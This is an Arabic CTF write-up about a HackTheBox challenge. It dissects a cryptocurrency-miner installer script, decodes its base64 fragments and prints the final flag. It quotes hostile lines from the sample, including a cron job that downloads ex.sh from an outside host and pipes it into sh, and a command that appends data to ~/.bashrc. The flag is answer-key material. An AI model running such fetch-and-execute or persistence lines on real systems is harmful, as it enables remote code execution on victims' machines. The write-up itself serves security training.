وصف

في السباق على Vitalium على المريخ، لجأ مجلس Arodor الشرير إلى إجراءات يائسة، حيث احتاج إلى أموال لمحاولات التعدين الخاصة بهم. لقد ابتكروا شبكة روبوت مصممة خصيصًا لاستخراج العملات المشفرة سرًا. لقد عثرنا على عينة من أداة تثبيت عامل منجم Arodor على الخادم الخاص بنا. وإدراكا لخطورة الوضع، بدأنا تحقيقا شاملا. بوجودك كقائد لها، تحتاج إلى كشف الأعمال الداخلية لآلية التثبيت. كان هذا الاكتشاف بمثابة نقطة تحول، حيث كشف عن مدى يأس أرودور. ومع ذلك، استمرت المعركة من أجل فيتاليوم، مما يحثنا على البقاء يقظين وتكييف دفاعاتنا السيبرانية لمواجهة التهديدات المستقبلية.

احصل على ملاحظات شهادة OSCP

الدورة العملية الكاملة لاختبار اختراق تطبيقات الويب

يُظهر التحدي نص bash طويل جدًا والذي يحتوي على بعض السلاسل المشفرة بـ base64 مثل تلك الموجودة أدناه

عنوان url المحلي =”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”

dest=$(صدى “X3QwX200cnN9Cg==”|base64 -d)

صدى "ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==" | base64 -d >> /home/$USER/.bashrc

صدى '* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1'

كل ما يتعين علينا فعله هو فك تشفير تلك السلاسل باستخدام Base64 وجمع الأجزاء التي تشكل العلم النهائي.

$ صدى cGFydDI9Il90aDMxcl93NHkiCg== | base64-د

$ صدى “X3QwX200cnN9Cg==”|base64 -d

$ صدى “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64-د

$ صدى -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d

العلم النهائي

HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}

قائمة تشغيل مقاطع فيديو HackTheBox

, , ,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات